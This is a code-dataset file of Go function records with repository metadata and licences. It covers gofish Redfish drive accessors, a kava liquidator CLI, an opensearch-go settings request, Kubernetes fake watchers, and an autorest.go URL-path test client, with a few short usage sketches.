for _, driveLink := range links.ItemLinks {
drive, err := GetDrive(c, driveLink)
if err != nil {
collectionError.Failures[driveLink] = err
} else {
result = append(result, drive)
}
}
if collectionError.Empty() {
return result, nil
}
return result, collectionError
}
func (drive *Drive) Assembly() (*Assembly, error) {
if drive.assembly == "" {
return nil, nil
}
return GetAssembly(drive.Client, drive.assembly)
}
func (drive *Drive) Chassis() (*Chassis, error) {
if drive.chassis == "" {
return nil, nil
}
return GetChassis(drive.Client, drive.chassis)
}
func (drive *Drive) Endpoints() ([]*Endpoint, error) {
var result []*Endpoint
collectionError := common.NewCollectionError()
for _, endpointLink := range drive.endpoints {
endpoint, err := GetEndpoint(drive.Client, endpointLink)
if err != nil {
collectionError.Failures[endpointLink] = err
} else {
result = append(result, endpoint)
}
}
if collectionError.Empty() {
return result, nil
}
return result, collectionError
}
func (drive *Drive) Volumes() ([]*Volume, error) {
var result []*Volume
collectionError := common.NewCollectionError()
for _, volumeLink := range drive.volumes {
volume, err := GetVolume(drive.Client, volumeLink)
if err != nil {
collectionError.Failures[volumeLink] = err
} else {
result = append(result, volume)
}
}
if collectionError.Empty() {
return result, nil
}
return result, collectionError
} | BSD 3-Clause New or Revised License |
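A hedged usage sketch for the Drive accessors above. It uses only functions shown in this record (GetDrive, Volumes, PCIeFunctions); obtaining a connected common.Client (for example via the gofish session setup) is out of scope here, and the drive URI is an assumed example value.

package drivesketch

import (
	"fmt"
	"log"

	"github.com/stmcginnis/gofish/common"
	"github.com/stmcginnis/gofish/redfish"
)

// printDrive fetches one drive and walks its linked resources.
func printDrive(c common.Client) {
	drive, err := redfish.GetDrive(c, "/redfish/v1/Systems/1/Storage/1/Drives/0")
	if err != nil {
		log.Fatal(err)
	}
	fmt.Printf("%s: %d bytes, %s\n", drive.Name, drive.CapacityBytes, drive.MediaType)

	// Linked collections return partial results plus a collection error,
	// so both the slice and the error can be non-nil at the same time.
	volumes, err := drive.Volumes()
	if err != nil {
		log.Printf("some volumes could not be fetched: %v", err)
	}
	for _, v := range volumes {
		fmt.Println("volume:", v.Name)
	}

	functions, err := drive.PCIeFunctions()
	if err != nil {
		log.Printf("some PCIe functions could not be fetched: %v", err)
	}
	fmt.Println("PCIe functions:", len(functions))
}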
kava-labs/kava-devnet | blockchain/x/liquidator/client/module_client.go | GetTxCmd | go | func (mc ModuleClient) GetTxCmd() *cobra.Command {
txCmd := &cobra.Command{
Use: "liquidator",
Short: "Liquidator transactions subcommands",
}
txCmd.AddCommand(client.PostCommands(
cli.GetCmd_SeizeAndStartCollateralAuction(mc.cdc),
cli.GetCmd_StartDebtAuction(mc.cdc),
)...)
return txCmd
} | GetTxCmd returns the transaction commands for this module | https://github.com/kava-labs/kava-devnet/blob/55fa119a0e667135152faa3e7c5e837705d36bc0/blockchain/x/liquidator/client/module_client.go#L37-L49 | package client
import (
"github.com/cosmos/cosmos-sdk/client"
"github.com/spf13/cobra"
amino "github.com/tendermint/go-amino"
"github.com/kava-labs/kava-devnet/blockchain/x/liquidator/client/cli"
)
type ModuleClient struct {
storeKey string
cdc *amino.Codec
}
func NewModuleClient(storeKey string, cdc *amino.Codec) ModuleClient {
return ModuleClient{storeKey, cdc}
}
func (mc ModuleClient) GetQueryCmd() *cobra.Command {
queryCmd := &cobra.Command{
Use: "liquidator",
Short: "Querying commands for the liquidator module",
}
queryCmd.AddCommand(client.GetCommands(
cli.GetCmd_GetOutstandingDebt(mc.storeKey, mc.cdc),
)...)
return queryCmd
} | Apache License 2.0 |
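A hedged sketch of wiring this module client into a root cobra command. The codec construction, root command name, and overall CLI assembly are assumptions typical of Cosmos SDK CLIs of that era, not code from this record; a real CLI would register the application's concrete types on the codec first.

package main

import (
	"github.com/spf13/cobra"
	amino "github.com/tendermint/go-amino"

	liquidatorclient "github.com/kava-labs/kava-devnet/blockchain/x/liquidator/client"
)

func main() {
	cdc := amino.NewCodec() // assumed: app types would normally be registered here
	mc := liquidatorclient.NewModuleClient("liquidator", cdc)

	rootCmd := &cobra.Command{Use: "kavacli"} // illustrative root command
	rootCmd.AddCommand(mc.GetQueryCmd(), mc.GetTxCmd())

	if err := rootCmd.Execute(); err != nil {
		panic(err)
	}
}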
opensearch-project/opensearch-go | opensearchapi/api.indices.get_settings.go | WithContext | go | func (f IndicesGetSettings) WithContext(v context.Context) func(*IndicesGetSettingsRequest) {
return func(r *IndicesGetSettingsRequest) {
r.ctx = v
}
} | WithContext sets the request context. | https://github.com/opensearch-project/opensearch-go/blob/fb1709a85d8d92ab3fcd153d54a561965e9c4f36/opensearchapi/api.indices.get_settings.go#L194-L198 | package opensearchapi
import (
"context"
"net/http"
"strconv"
"strings"
"time"
)
func newIndicesGetSettingsFunc(t Transport) IndicesGetSettings {
return func(o ...func(*IndicesGetSettingsRequest)) (*Response, error) {
var r = IndicesGetSettingsRequest{}
for _, f := range o {
f(&r)
}
return r.Do(r.ctx, t)
}
}
type IndicesGetSettings func(o ...func(*IndicesGetSettingsRequest)) (*Response, error)
type IndicesGetSettingsRequest struct {
Index []string
Name []string
AllowNoIndices *bool
ExpandWildcards string
FlatSettings *bool
IgnoreUnavailable *bool
IncludeDefaults *bool
Local *bool
MasterTimeout time.Duration
Pretty bool
Human bool
ErrorTrace bool
FilterPath []string
Header http.Header
ctx context.Context
}
func (r IndicesGetSettingsRequest) Do(ctx context.Context, transport Transport) (*Response, error) {
var (
method string
path strings.Builder
params map[string]string
)
method = "GET"
path.Grow(1 + len(strings.Join(r.Index, ",")) + 1 + len("_settings") + 1 + len(strings.Join(r.Name, ",")))
if len(r.Index) > 0 {
path.WriteString("/")
path.WriteString(strings.Join(r.Index, ","))
}
path.WriteString("/")
path.WriteString("_settings")
if len(r.Name) > 0 {
path.WriteString("/")
path.WriteString(strings.Join(r.Name, ","))
}
params = make(map[string]string)
if r.AllowNoIndices != nil {
params["allow_no_indices"] = strconv.FormatBool(*r.AllowNoIndices)
}
if r.ExpandWildcards != "" {
params["expand_wildcards"] = r.ExpandWildcards
}
if r.FlatSettings != nil {
params["flat_settings"] = strconv.FormatBool(*r.FlatSettings)
}
if r.IgnoreUnavailable != nil {
params["ignore_unavailable"] = strconv.FormatBool(*r.IgnoreUnavailable)
}
if r.IncludeDefaults != nil {
params["include_defaults"] = strconv.FormatBool(*r.IncludeDefaults)
}
if r.Local != nil {
params["local"] = strconv.FormatBool(*r.Local)
}
if r.MasterTimeout != 0 {
params["master_timeout"] = formatDuration(r.MasterTimeout)
}
if r.Pretty {
params["pretty"] = "true"
}
if r.Human {
params["human"] = "true"
}
if r.ErrorTrace {
params["error_trace"] = "true"
}
if len(r.FilterPath) > 0 {
params["filter_path"] = strings.Join(r.FilterPath, ",")
}
req, err := newRequest(method, path.String(), nil)
if err != nil {
return nil, err
}
if len(params) > 0 {
q := req.URL.Query()
for k, v := range params {
q.Set(k, v)
}
req.URL.RawQuery = q.Encode()
}
if len(r.Header) > 0 {
if len(req.Header) == 0 {
req.Header = r.Header
} else {
for k, vv := range r.Header {
for _, v := range vv {
req.Header.Add(k, v)
}
}
}
}
if ctx != nil {
req = req.WithContext(ctx)
}
res, err := transport.Perform(req)
if err != nil {
return nil, err
}
response := Response{
StatusCode: res.StatusCode,
Body: res.Body,
Header: res.Header,
}
return &response, nil
} | Apache License 2.0 |
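A hedged usage sketch for the request type above, built from the struct fields and Do method shown in this record. The opensearch.NewDefaultClient constructor (which targets http://localhost:9200) and the index name are assumptions; any Transport whose Perform method issues the request would work.

package main

import (
	"context"
	"io"
	"log"

	"github.com/opensearch-project/opensearch-go"
	"github.com/opensearch-project/opensearch-go/opensearchapi"
)

func main() {
	client, err := opensearch.NewDefaultClient() // assumed default constructor
	if err != nil {
		log.Fatal(err)
	}

	includeDefaults := true
	req := opensearchapi.IndicesGetSettingsRequest{
		Index:           []string{"my-index"}, // example index name
		IncludeDefaults: &includeDefaults,
		Pretty:          true,
	}

	res, err := req.Do(context.Background(), client)
	if err != nil {
		log.Fatal(err)
	}
	defer res.Body.Close()

	body, _ := io.ReadAll(res.Body)
	log.Printf("status=%d settings=%s", res.StatusCode, body)
}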
kubernetes-sigs/cluster-addons | installer/vendor/k8s.io/apimachinery/pkg/watch/watch.go | Error | go | func (f *RaceFreeFakeWatcher) Error(errValue runtime.Object) {
f.Lock()
defer f.Unlock()
if !f.Stopped {
select {
case f.result <- Event{Error, errValue}:
return
default:
panic(fmt.Errorf("channel full"))
}
}
} | Error sends an Error event. | https://github.com/kubernetes-sigs/cluster-addons/blob/a8622ef8b343e3b511ecc2058c2b15058b481ddb/installer/vendor/k8s.io/apimachinery/pkg/watch/watch.go#L250-L261 | package watch
import (
"fmt"
"sync"
"k8s.io/klog"
"k8s.io/apimachinery/pkg/runtime"
)
type Interface interface {
Stop()
ResultChan() <-chan Event
}
type EventType string
const (
Added EventType = "ADDED"
Modified EventType = "MODIFIED"
Deleted EventType = "DELETED"
Bookmark EventType = "BOOKMARK"
Error EventType = "ERROR"
DefaultChanSize int32 = 100
)
type Event struct {
Type EventType
Object runtime.Object
}
type emptyWatch chan Event
func NewEmptyWatch() Interface {
ch := make(chan Event)
close(ch)
return emptyWatch(ch)
}
func (w emptyWatch) Stop() {
}
func (w emptyWatch) ResultChan() <-chan Event {
return chan Event(w)
}
type FakeWatcher struct {
result chan Event
Stopped bool
sync.Mutex
}
func NewFake() *FakeWatcher {
return &FakeWatcher{
result: make(chan Event),
}
}
func NewFakeWithChanSize(size int, blocking bool) *FakeWatcher {
return &FakeWatcher{
result: make(chan Event, size),
}
}
func (f *FakeWatcher) Stop() {
f.Lock()
defer f.Unlock()
if !f.Stopped {
klog.V(4).Infof("Stopping fake watcher.")
close(f.result)
f.Stopped = true
}
}
func (f *FakeWatcher) IsStopped() bool {
f.Lock()
defer f.Unlock()
return f.Stopped
}
func (f *FakeWatcher) Reset() {
f.Lock()
defer f.Unlock()
f.Stopped = false
f.result = make(chan Event)
}
func (f *FakeWatcher) ResultChan() <-chan Event {
return f.result
}
func (f *FakeWatcher) Add(obj runtime.Object) {
f.result <- Event{Added, obj}
}
func (f *FakeWatcher) Modify(obj runtime.Object) {
f.result <- Event{Modified, obj}
}
func (f *FakeWatcher) Delete(lastValue runtime.Object) {
f.result <- Event{Deleted, lastValue}
}
func (f *FakeWatcher) Error(errValue runtime.Object) {
f.result <- Event{Error, errValue}
}
func (f *FakeWatcher) Action(action EventType, obj runtime.Object) {
f.result <- Event{action, obj}
}
type RaceFreeFakeWatcher struct {
result chan Event
Stopped bool
sync.Mutex
}
func NewRaceFreeFake() *RaceFreeFakeWatcher {
return &RaceFreeFakeWatcher{
result: make(chan Event, DefaultChanSize),
}
}
func (f *RaceFreeFakeWatcher) Stop() {
f.Lock()
defer f.Unlock()
if !f.Stopped {
klog.V(4).Infof("Stopping fake watcher.")
close(f.result)
f.Stopped = true
}
}
func (f *RaceFreeFakeWatcher) IsStopped() bool {
f.Lock()
defer f.Unlock()
return f.Stopped
}
func (f *RaceFreeFakeWatcher) Reset() {
f.Lock()
defer f.Unlock()
f.Stopped = false
f.result = make(chan Event, DefaultChanSize)
}
func (f *RaceFreeFakeWatcher) ResultChan() <-chan Event {
f.Lock()
defer f.Unlock()
return f.result
}
func (f *RaceFreeFakeWatcher) Add(obj runtime.Object) {
f.Lock()
defer f.Unlock()
if !f.Stopped {
select {
case f.result <- Event{Added, obj}:
return
default:
panic(fmt.Errorf("channel full"))
}
}
}
func (f *RaceFreeFakeWatcher) Modify(obj runtime.Object) {
f.Lock()
defer f.Unlock()
if !f.Stopped {
select {
case f.result <- Event{Modified, obj}:
return
default:
panic(fmt.Errorf("channel full"))
}
}
}
func (f *RaceFreeFakeWatcher) Delete(lastValue runtime.Object) {
f.Lock()
defer f.Unlock()
if !f.Stopped {
select {
case f.result <- Event{Deleted, lastValue}:
return
default:
panic(fmt.Errorf("channel full"))
}
}
} | Apache License 2.0 |
azure/autorest.go | test/autorest/urlgroup/zz_generated_paths_client.go | getIntOneMillionCreateRequest | go | func (client *PathsClient) getIntOneMillionCreateRequest(ctx context.Context, options *PathsGetIntOneMillionOptions) (*policy.Request, error) {
urlPath := "/paths/int/1000000/{intPath}"
urlPath = strings.ReplaceAll(urlPath, "{intPath}", url.PathEscape("1000000"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
} | getIntOneMillionCreateRequest creates the GetIntOneMillion request. | https://github.com/azure/autorest.go/blob/01cdd9c890252a9ef822f6d3f2e1273ff9e99cb6/test/autorest/urlgroup/zz_generated_paths_client.go#L815-L824 | package urlgroup
import (
"context"
"encoding/base64"
"errors"
"fmt"
"github.com/Azure/azure-sdk-for-go/sdk/azcore/policy"
"github.com/Azure/azure-sdk-for-go/sdk/azcore/runtime"
"net/http"
"net/url"
"strings"
"time"
)
type PathsClient struct {
con *Connection
}
func NewPathsClient(con *Connection) *PathsClient {
return &PathsClient{con: con}
}
func (client *PathsClient) ArrayCSVInPath(ctx context.Context, arrayPath []string, options *PathsArrayCSVInPathOptions) (PathsArrayCSVInPathResponse, error) {
req, err := client.arrayCSVInPathCreateRequest(ctx, arrayPath, options)
if err != nil {
return PathsArrayCSVInPathResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsArrayCSVInPathResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsArrayCSVInPathResponse{}, client.arrayCSVInPathHandleError(resp)
}
return PathsArrayCSVInPathResponse{RawResponse: resp}, nil
}
func (client *PathsClient) arrayCSVInPathCreateRequest(ctx context.Context, arrayPath []string, options *PathsArrayCSVInPathOptions) (*policy.Request, error) {
urlPath := "/paths/array/ArrayPath1%2cbegin%21%2A%27%28%29%3B%3A%40%20%26%3D%2B%24%2C%2F%3F%23%5B%5Dend%2c%2c/{arrayPath}"
urlPath = strings.ReplaceAll(urlPath, "{arrayPath}", url.PathEscape(strings.Join(arrayPath, ",")))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) arrayCSVInPathHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) Base64URL(ctx context.Context, base64URLPath []byte, options *PathsBase64URLOptions) (PathsBase64URLResponse, error) {
req, err := client.base64URLCreateRequest(ctx, base64URLPath, options)
if err != nil {
return PathsBase64URLResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsBase64URLResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsBase64URLResponse{}, client.base64URLHandleError(resp)
}
return PathsBase64URLResponse{RawResponse: resp}, nil
}
func (client *PathsClient) base64URLCreateRequest(ctx context.Context, base64URLPath []byte, options *PathsBase64URLOptions) (*policy.Request, error) {
urlPath := "/paths/string/bG9yZW0/{base64UrlPath}"
urlPath = strings.ReplaceAll(urlPath, "{base64UrlPath}", url.PathEscape(base64.RawURLEncoding.EncodeToString(base64URLPath)))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) base64URLHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) ByteEmpty(ctx context.Context, options *PathsByteEmptyOptions) (PathsByteEmptyResponse, error) {
req, err := client.byteEmptyCreateRequest(ctx, options)
if err != nil {
return PathsByteEmptyResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsByteEmptyResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsByteEmptyResponse{}, client.byteEmptyHandleError(resp)
}
return PathsByteEmptyResponse{RawResponse: resp}, nil
}
func (client *PathsClient) byteEmptyCreateRequest(ctx context.Context, options *PathsByteEmptyOptions) (*policy.Request, error) {
urlPath := "/paths/byte/empty/{bytePath}"
urlPath = strings.ReplaceAll(urlPath, "{bytePath}", url.PathEscape(""))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) byteEmptyHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) ByteMultiByte(ctx context.Context, bytePath []byte, options *PathsByteMultiByteOptions) (PathsByteMultiByteResponse, error) {
req, err := client.byteMultiByteCreateRequest(ctx, bytePath, options)
if err != nil {
return PathsByteMultiByteResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsByteMultiByteResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsByteMultiByteResponse{}, client.byteMultiByteHandleError(resp)
}
return PathsByteMultiByteResponse{RawResponse: resp}, nil
}
func (client *PathsClient) byteMultiByteCreateRequest(ctx context.Context, bytePath []byte, options *PathsByteMultiByteOptions) (*policy.Request, error) {
urlPath := "/paths/byte/multibyte/{bytePath}"
urlPath = strings.ReplaceAll(urlPath, "{bytePath}", url.PathEscape(base64.StdEncoding.EncodeToString(bytePath)))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) byteMultiByteHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) ByteNull(ctx context.Context, bytePath []byte, options *PathsByteNullOptions) (PathsByteNullResponse, error) {
req, err := client.byteNullCreateRequest(ctx, bytePath, options)
if err != nil {
return PathsByteNullResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsByteNullResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusBadRequest) {
return PathsByteNullResponse{}, client.byteNullHandleError(resp)
}
return PathsByteNullResponse{RawResponse: resp}, nil
}
func (client *PathsClient) byteNullCreateRequest(ctx context.Context, bytePath []byte, options *PathsByteNullOptions) (*policy.Request, error) {
urlPath := "/paths/byte/null/{bytePath}"
urlPath = strings.ReplaceAll(urlPath, "{bytePath}", url.PathEscape(base64.StdEncoding.EncodeToString(bytePath)))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) byteNullHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) DateNull(ctx context.Context, datePath time.Time, options *PathsDateNullOptions) (PathsDateNullResponse, error) {
req, err := client.dateNullCreateRequest(ctx, datePath, options)
if err != nil {
return PathsDateNullResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsDateNullResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusBadRequest) {
return PathsDateNullResponse{}, client.dateNullHandleError(resp)
}
return PathsDateNullResponse{RawResponse: resp}, nil
}
func (client *PathsClient) dateNullCreateRequest(ctx context.Context, datePath time.Time, options *PathsDateNullOptions) (*policy.Request, error) {
urlPath := "/paths/date/null/{datePath}"
urlPath = strings.ReplaceAll(urlPath, "{datePath}", url.PathEscape(datePath.Format("2006-01-02")))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) dateNullHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) DateTimeNull(ctx context.Context, dateTimePath time.Time, options *PathsDateTimeNullOptions) (PathsDateTimeNullResponse, error) {
req, err := client.dateTimeNullCreateRequest(ctx, dateTimePath, options)
if err != nil {
return PathsDateTimeNullResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsDateTimeNullResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusBadRequest) {
return PathsDateTimeNullResponse{}, client.dateTimeNullHandleError(resp)
}
return PathsDateTimeNullResponse{RawResponse: resp}, nil
}
func (client *PathsClient) dateTimeNullCreateRequest(ctx context.Context, dateTimePath time.Time, options *PathsDateTimeNullOptions) (*policy.Request, error) {
urlPath := "/paths/datetime/null/{dateTimePath}"
urlPath = strings.ReplaceAll(urlPath, "{dateTimePath}", url.PathEscape(dateTimePath.Format(time.RFC3339Nano)))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) dateTimeNullHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) DateTimeValid(ctx context.Context, options *PathsDateTimeValidOptions) (PathsDateTimeValidResponse, error) {
req, err := client.dateTimeValidCreateRequest(ctx, options)
if err != nil {
return PathsDateTimeValidResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsDateTimeValidResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsDateTimeValidResponse{}, client.dateTimeValidHandleError(resp)
}
return PathsDateTimeValidResponse{RawResponse: resp}, nil
}
func (client *PathsClient) dateTimeValidCreateRequest(ctx context.Context, options *PathsDateTimeValidOptions) (*policy.Request, error) {
urlPath := "/paths/datetime/2012-01-01T01%3A01%3A01Z/{dateTimePath}"
urlPath = strings.ReplaceAll(urlPath, "{dateTimePath}", url.PathEscape("2012-01-01T01:01:01Z"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) dateTimeValidHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) DateValid(ctx context.Context, options *PathsDateValidOptions) (PathsDateValidResponse, error) {
req, err := client.dateValidCreateRequest(ctx, options)
if err != nil {
return PathsDateValidResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsDateValidResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsDateValidResponse{}, client.dateValidHandleError(resp)
}
return PathsDateValidResponse{RawResponse: resp}, nil
}
func (client *PathsClient) dateValidCreateRequest(ctx context.Context, options *PathsDateValidOptions) (*policy.Request, error) {
urlPath := "/paths/date/2012-01-01/{datePath}"
urlPath = strings.ReplaceAll(urlPath, "{datePath}", url.PathEscape("2012-01-01"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) dateValidHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) DoubleDecimalNegative(ctx context.Context, options *PathsDoubleDecimalNegativeOptions) (PathsDoubleDecimalNegativeResponse, error) {
req, err := client.doubleDecimalNegativeCreateRequest(ctx, options)
if err != nil {
return PathsDoubleDecimalNegativeResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsDoubleDecimalNegativeResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsDoubleDecimalNegativeResponse{}, client.doubleDecimalNegativeHandleError(resp)
}
return PathsDoubleDecimalNegativeResponse{RawResponse: resp}, nil
}
func (client *PathsClient) doubleDecimalNegativeCreateRequest(ctx context.Context, options *PathsDoubleDecimalNegativeOptions) (*policy.Request, error) {
urlPath := "/paths/double/-9999999.999/{doublePath}"
urlPath = strings.ReplaceAll(urlPath, "{doublePath}", url.PathEscape("-9999999.999"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) doubleDecimalNegativeHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) DoubleDecimalPositive(ctx context.Context, options *PathsDoubleDecimalPositiveOptions) (PathsDoubleDecimalPositiveResponse, error) {
req, err := client.doubleDecimalPositiveCreateRequest(ctx, options)
if err != nil {
return PathsDoubleDecimalPositiveResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsDoubleDecimalPositiveResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsDoubleDecimalPositiveResponse{}, client.doubleDecimalPositiveHandleError(resp)
}
return PathsDoubleDecimalPositiveResponse{RawResponse: resp}, nil
}
func (client *PathsClient) doubleDecimalPositiveCreateRequest(ctx context.Context, options *PathsDoubleDecimalPositiveOptions) (*policy.Request, error) {
urlPath := "/paths/double/9999999.999/{doublePath}"
urlPath = strings.ReplaceAll(urlPath, "{doublePath}", url.PathEscape("9999999.999"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) doubleDecimalPositiveHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) EnumNull(ctx context.Context, enumPath URIColor, options *PathsEnumNullOptions) (PathsEnumNullResponse, error) {
req, err := client.enumNullCreateRequest(ctx, enumPath, options)
if err != nil {
return PathsEnumNullResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsEnumNullResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusBadRequest) {
return PathsEnumNullResponse{}, client.enumNullHandleError(resp)
}
return PathsEnumNullResponse{RawResponse: resp}, nil
}
func (client *PathsClient) enumNullCreateRequest(ctx context.Context, enumPath URIColor, options *PathsEnumNullOptions) (*policy.Request, error) {
urlPath := "/paths/string/null/{enumPath}"
if enumPath == "" {
return nil, errors.New("parameter enumPath cannot be empty")
}
urlPath = strings.ReplaceAll(urlPath, "{enumPath}", url.PathEscape(string(enumPath)))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) enumNullHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
